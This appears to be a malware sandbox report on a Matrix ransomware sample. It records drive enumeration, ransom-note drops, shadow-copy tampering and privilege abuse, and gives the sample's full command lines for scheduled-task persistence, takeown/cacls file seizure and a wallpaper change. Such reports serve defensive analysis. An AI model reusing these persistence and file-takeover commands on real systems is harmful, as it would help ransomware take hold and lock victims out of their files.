242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\E: tuXIqMZb64.exe File opened (read-only) \??\F: tuXIqMZb64.exe File opened (read-only) \??\I: tuXIqMZb64.exe File opened (read-only) \??\P: tuXIqMZb64.exe File opened (read-only) \??\T: tuXIqMZb64.exe File opened (read-only) \??\U: tuXIqMZb64.exe File opened (read-only) \??\W: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\U: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\N: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\N: tuXIqMZb64.exe File opened (read-only) \??\Q: tuXIqMZb64.exe File opened (read-only) \??\W: tuXIqMZb64.exe File opened (read-only) \??\R: tuXIqMZb64.exe File opened (read-only) \??\X: tuXIqMZb64.exe File opened (read-only) \??\B: tuXIqMZb64.exe File opened (read-only) \??\T: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\Q: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\P: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\M: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\L: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\G: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\A: tuXIqMZb64.exe File opened (read-only) \??\J: tuXIqMZb64.exe File opened (read-only) \??\K: tuXIqMZb64.exe File opened (read-only) \??\S: tuXIqMZb64.exe File opened (read-only) \??\Y: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\V: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\I: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\H: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\G: tuXIqMZb64.exe File opened (read-only) \??\L: tuXIqMZb64.exe File opened (read-only) \??\K: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\E: 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened (read-only) \??\M: tuXIqMZb64.exe File opened (read-only) \??\V: tuXIqMZb64.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\nH19RRW3.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_100_percent.pak 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\en-US\Mahjong.exe.mui 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\ConfirmResume.vssx 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Microsoft Games\Chess\de-DE\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\ConvertAdd.css 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#README_EMAN#.rtf 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\docs.crx 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 628 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2024 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1572 tuXIqMZb64.exe 1572 tuXIqMZb64.exe 1572 tuXIqMZb64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1572 tuXIqMZb64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1572 tuXIqMZb64.exe Token: SeLoadDriverPrivilege 1572 tuXIqMZb64.exe Token: SeTakeOwnershipPrivilege 528 takeown.exe Token: SeTakeOwnershipPrivilege 956 takeown.exe Token: SeTakeOwnershipPrivilege 1620 takeown.exe Token: SeTakeOwnershipPrivilege 1588 takeown.exe Token: SeTakeOwnershipPrivilege 1984 takeown.exe Token: SeTakeOwnershipPrivilege 1816 takeown.exe Token: SeTakeOwnershipPrivilege 848 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 1444 takeown.exe Token: SeTakeOwnershipPrivilege 1620 takeown.exe Token: SeTakeOwnershipPrivilege 1216 takeown.exe Token: SeTakeOwnershipPrivilege 1240 takeown.exe Token: SeTakeOwnershipPrivilege 1396 takeown.exe Token: SeTakeOwnershipPrivilege 1000 takeown.exe Token: SeTakeOwnershipPrivilege 1952 takeown.exe Token: SeTakeOwnershipPrivilege 1784 takeown.exe Token: SeTakeOwnershipPrivilege 408 takeown.exe Token: SeTakeOwnershipPrivilege 1776 takeown.exe Token: SeTakeOwnershipPrivilege 1408 takeown.exe Token: SeTakeOwnershipPrivilege 1736 takeown.exe Token: SeTakeOwnershipPrivilege 620 takeown.exe Token: SeTakeOwnershipPrivilege 1504 takeown.exe Token: SeTakeOwnershipPrivilege 1908 takeown.exe Token: SeTakeOwnershipPrivilege 1972 takeown.exe Token: SeTakeOwnershipPrivilege 1952 takeown.exe Token: SeTakeOwnershipPrivilege 544 takeown.exe Token: SeTakeOwnershipPrivilege 1724 takeown.exe Token: SeTakeOwnershipPrivilege 680 takeown.exe Token: SeTakeOwnershipPrivilege 1984 takeown.exe Token: SeTakeOwnershipPrivilege 1124 takeown.exe Token: SeTakeOwnershipPrivilege 1736 takeown.exe Token: SeTakeOwnershipPrivilege 1716 takeown.exe Token: SeTakeOwnershipPrivilege 1424 takeown.exe Token: SeTakeOwnershipPrivilege 1512 takeown.exe Token: SeTakeOwnershipPrivilege 2004 takeown.exe Token: SeTakeOwnershipPrivilege 1424 takeown.exe Token: SeBackupPrivilege 1648 vssvc.exe Token: SeRestorePrivilege 1648 vssvc.exe Token: SeAuditPrivilege 1648 vssvc.exe Token: SeTakeOwnershipPrivilege 904 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 1168 takeown.exe Token: SeTakeOwnershipPrivilege 1740 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 996 takeown.exe Token: SeTakeOwnershipPrivilege 1768 takeown.exe Token: SeTakeOwnershipPrivilege 1184 takeown.exe Token: SeTakeOwnershipPrivilege 1180 takeown.exe Token: SeTakeOwnershipPrivilege 1844 takeown.exe Token: SeTakeOwnershipPrivilege 692 takeown.exe Token: SeTakeOwnershipPrivilege 1624 takeown.exe Token: SeTakeOwnershipPrivilege 2008 takeown.exe Token: SeTakeOwnershipPrivilege 1700 takeown.exe Token: SeTakeOwnershipPrivilege 996 takeown.exe Token: SeTakeOwnershipPrivilege 1364 takeown.exe Token: SeTakeOwnershipPrivilege 1108 takeown.exe Token: SeTakeOwnershipPrivilege 320 takeown.exe Token: SeTakeOwnershipPrivilege 1900 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 796 takeown.exe Token: SeTakeOwnershipPrivilege 2008 takeown.exe Token: SeTakeOwnershipPrivilege 1100 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1492 wrote to memory of 664 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 28 PID 1492 wrote to memory of 664 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 28 PID 1492 wrote to memory of 664 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 28 PID 1492 wrote to memory of 664 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 28 PID 1492 wrote to memory of 1240 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 30 PID 1492 wrote to memory of 1240 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 30 PID 1492 wrote to memory of 1240 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 30 PID 1492 wrote to memory of 1240 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 30 PID 1492 wrote to memory of 936 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 32 PID 1492 wrote to memory of 936 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 32 PID 1492 wrote to memory of 936 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 32 PID 1492 wrote to memory of 936 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 32 PID 1492 wrote to memory of 1972 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 33 PID 1492 wrote to memory of 1972 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 33 PID 1492 wrote to memory of 1972 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 33 PID 1492 wrote to memory of 1972 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 33 PID 936 wrote to memory of 1724 936 cmd.exe 37 PID 936 wrote to memory of 1724 936 cmd.exe 37 PID 936 wrote to memory of 1724 936 cmd.exe 37 PID 936 wrote to memory of 1724 936 cmd.exe 37 PID 1972 wrote to memory of 904 1972 cmd.exe 36 PID 1972 wrote to memory of 904 1972 cmd.exe 36 PID 1972 wrote to memory of 904 1972 cmd.exe 36 PID 1972 wrote to memory of 904 1972 cmd.exe 36 PID 936 wrote to memory of 1108 936 cmd.exe 38 PID 936 wrote to memory of 1108 936 cmd.exe 38 PID 936 wrote to memory of 1108 936 cmd.exe 38 PID 936 wrote to memory of 1108 936 cmd.exe 38 PID 936 wrote to memory of 1592 936 cmd.exe 39 PID 936 wrote to memory of 1592 936 cmd.exe 39 PID 936 wrote to memory of 1592 936 cmd.exe 39 PID 936 wrote to memory of 1592 936 cmd.exe 39 PID 1492 wrote to memory of 956 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 41 PID 1492 wrote to memory of 956 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 41 PID 1492 wrote to memory of 956 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 41 PID 1492 wrote to memory of 956 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 41 PID 956 wrote to memory of 1396 956 cmd.exe 43 PID 956 wrote to memory of 1396 956 cmd.exe 43 PID 956 wrote to memory of 1396 956 cmd.exe 43 PID 956 wrote to memory of 1396 956 cmd.exe 43 PID 956 wrote to memory of 1204 956 cmd.exe 44 PID 956 wrote to memory of 1204 956 cmd.exe 44 PID 956 wrote to memory of 1204 956 cmd.exe 44 PID 956 wrote to memory of 1204 956 cmd.exe 44 PID 956 wrote to memory of 1124 956 cmd.exe 45 PID 956 wrote to memory of 1124 956 cmd.exe 45 PID 956 wrote to memory of 1124 956 cmd.exe 45 PID 956 wrote to memory of 1124 956 cmd.exe 45 PID 1124 wrote to memory of 1084 1124 cmd.exe 46 PID 1124 wrote to memory of 1084 1124 cmd.exe 46 PID 1124 wrote to memory of 1084 1124 cmd.exe 46 PID 1124 wrote to memory of 1084 1124 cmd.exe 46 PID 1492 wrote to memory of 824 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 47 PID 1492 wrote to memory of 824 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 47 PID 1492 wrote to memory of 824 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 47 PID 1492 wrote to memory of 824 1492 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe 47 PID 824 wrote to memory of 796 824 cmd.exe 49 PID 824 wrote to memory of 796 824 cmd.exe 49 PID 824 wrote to memory of 796 824 cmd.exe 49 PID 824 wrote to memory of 796 824 cmd.exe 49 PID 824 wrote to memory of 1516 824 cmd.exe 50 PID 824 wrote to memory of 1516 824 cmd.exe 50 PID 824 wrote to memory of 1516 824 cmd.exe 50 PID 824 wrote to memory of 1516 824 cmd.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe"C:\Users\Admin\AppData\Local\Temp\242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95.exe" "C:\Users\Admin\AppData\Local\Temp\NWGGzsKV.exe"2⤵PID:664
-
-
C:\Users\Admin\AppData\Local\Temp\NWGGzsKV.exe"C:\Users\Admin\AppData\Local\Temp\NWGGzsKV.exe" -n2⤵
- Executes dropped EXE
PID:1240
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nH19RRW3.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nH19RRW3.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1108
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CFI7917d.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CFI7917d.vbs"3⤵PID:904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3r13J0nw.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:1320
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3r13J0nw.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:628
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1512
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1120
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵
- Modifies file permissions
PID:1204
-
-
